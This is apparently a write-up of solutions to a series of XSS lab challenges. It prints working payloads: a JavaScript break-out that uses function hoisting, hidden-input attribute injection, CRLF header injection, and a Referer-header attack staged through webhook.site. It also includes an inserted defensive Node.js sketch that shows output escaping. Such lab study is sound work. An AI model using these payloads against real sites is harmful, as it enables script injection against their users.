Breaking out of the JS object and adding an alert function will not work here because of this code:
parent.Arbiter.inform("data", {"id":"});
This JS code throws an error first, which then prevents our alert function from executing.
So what's the error?
Arbiter is undefined in the code, so accessing anything on it causes an error.
In JavaScript, Hoisting refers to the process whereby the interpreter appears to move the declaration of functions, variables or classes to the top of their scope, prior to execution of the code.
Using this concept we can solve this challenge.
// Payload
alert`xss`});function Arbiter(){};//
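As an added example (not part of the original write-up), this Node.js sketch shows why the script error is not a defence, and how emitting the value as an escaped JSON string literal neutralises the payload above. It assumes the server reflects the value unquoted as `{"id":<INPUT>}`; `renderVulnerable`, `renderHardened` and `run` are hypothetical names.

```javascript
const vm = require('node:vm');

// Payload from the write-up above.
const PAGE_PAYLOAD = 'alert`xss`});function Arbiter(){};//';

// Vulnerable (assumed template): the raw value is concatenated into the script.
function renderVulnerable(id) {
  return `parent.Arbiter.inform("data", {"id":${id}});`;
}

// Hardened: emit the value as a JSON string literal and escape characters
// that could close the <script> element or end a JS line.
function renderHardened(id) {
  const literal = JSON.stringify(String(id)).replace(
    /[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
  return `parent.Arbiter.inform("data", {"id":${literal}});`;
}

// Run a script in a fresh context that mimics the page: `parent` is the
// global object, `alert` is a recording stub, and Arbiter is not defined.
function run(script) {
  const calls = [];
  const ctx = vm.createContext({ alert: (...args) => calls.push(args) });
  vm.runInContext('var parent = globalThis;', ctx);
  let error = null;
  try { vm.runInContext(script, ctx); } catch (e) { error = e.name; }
  return { alertCalls: calls.length, error };
}

// Constructed inputs: a benign id, a plain break-out, and the page's payload.
for (const [label, script] of [
  ['benign id', renderVulnerable('123')],
  ['plain break-out', renderVulnerable('1});alert(1);//')],
  ['hoisted Arbiter', renderVulnerable(PAGE_PAYLOAD)],
  ['hardened output', renderHardened(PAGE_PAYLOAD)],
]) {
  console.log(label.padEnd(16), JSON.stringify(run(script)));
}
```

The hoisted declaration makes `parent.Arbiter` exist, so the call's arguments are evaluated (running the stub) before the script still fails on the missing `inform` method. With the hardened template the same input stays inside a string literal.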
Our input is reflected in an input tag which is hidden.
// Payload
hello" autofocus onfocus=alert('xss') type="text
Same as Challenge 1
// Payload
alert`xss`});function Arbiter(){};//
This lab is a combination of CRLF injection and XSS.
// Payload
%0AContent-Type%3A%20Sankalpa%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20texml%0A%3Cimg%20src%3Dx%20onerror%3Dalert(%27xss%27)%3E
// Payload
https://javascript%27%20autofocus%20onfocus='alert``
This Lab is interesting😉.
We can easily inject
<img src=x onerror=alert('xss')>
in the Referer header. But the main challenge is: how can we send the payload in the Referer header without adding it manually?
For this, our domain would have to be something like this:
https://<img src=x onerror=alert('xss')>.com
That is not possible, but we can definitely do this:
https://sankalpa.info.np/<img src=x onerror=alert('xss')>
I used the webhook.site site to exploit it.
- Create your webhook URL
- Click on the edit icon at the top right-hand side.
- Change the content type to text/html
- Paste the code below in the body section and save.
<a id="ss" href="https://secbot-xss-challenges.vercel.app/xss-challenge6.php" >click me</a>
<script>
document.getElementById('ss').click()
</script>
Your webhook URL should look like this: https://webhook.site/<UUID>/<img src=x onerror=alert('xss')>/
When you visit the webhook URL, you will be redirected to https://secbot-xss-challenges.vercel.app/xss-challenge6.php with an alert pop-up.
Thanks For Reading ❤️